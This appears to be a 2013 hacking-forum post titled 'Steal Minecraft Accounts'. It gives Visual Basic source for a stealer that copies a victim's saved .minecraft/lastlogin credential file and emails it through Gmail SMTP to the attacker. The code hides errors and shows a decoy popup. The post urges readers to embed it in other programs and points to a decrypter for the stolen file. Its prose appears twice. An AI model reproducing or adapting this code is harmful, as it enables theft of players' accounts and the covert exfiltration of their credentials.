Steal Minecraft Accounts 04-28-2013, 01:19 AM
#1
Hey guys, I came up with this method around 6 months ago, and never thought to improve/share it, so here it is.
What It Is:
It copies the .minecraft/lastlogin file and emails it to your own email address via SMTP.
How It's Done:
I created this very basic 'program' in VB a while ago, It should be fairly easy to convert it into another language, or integrate this into another program.
Let's Make this thing!
Due to the lastlogin file being encrypted, you can use this program to 'decrypt' it.
WARNING: This will only work if they have the 'Remember Password' option ticked.
lastlogin decrypter: Download
VB Code:
I hope you can take this and develop off of it, If you need any help just comment, I may work on this and try to expand and improve on it.
Peace!
What It Is:
It copies the .minecraft/lastlogin file and emails it to your own email address via SMTP.
How It's Done:
I created this very basic 'program' in VB a while ago, It should be fairly easy to convert it into another language, or integrate this into another program.
Let's Make this thing!
Due to the lastlogin file being encrypted, you can use this program to 'decrypt' it.
WARNING: This will only work if they have the 'Remember Password' option ticked.
lastlogin decrypter: Download
VB Code:
Code:
Imports System.Net.Mail
Public Class Form1
Dim smtp As New SmtpClient
Dim mail As New MailMessage
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
Dim MyMailMessage As New MailMessage()
Try
Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
MyMailMessage.Attachments.Add(Attch)
MyMailMessage.From = New MailAddress("senderaddress@gmail.com")
MyMailMessage.To.Add("receiveraddress@googlemail.com")
MyMailMessage.Subject = ("Last Login File")
MyMailMessage.Body = (" ")
Dim SMTP As New SmtpClient("smtp.gmail.com")
SMTP.Port = 587
SMTP.EnableSsl = True
SMTP.Credentials = New System.Net.NetworkCredential("senderaddress@gmail.com", "senderpassword")
SMTP.Send(MyMailMessage)
Catch ex As Exception
End Try
MsgBox("Popup after button press.")
End Sub
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
End Sub
End Class
I hope you can take this and develop off of it, If you need any help just comment, I may work on this and try to expand and improve on it.
Peace!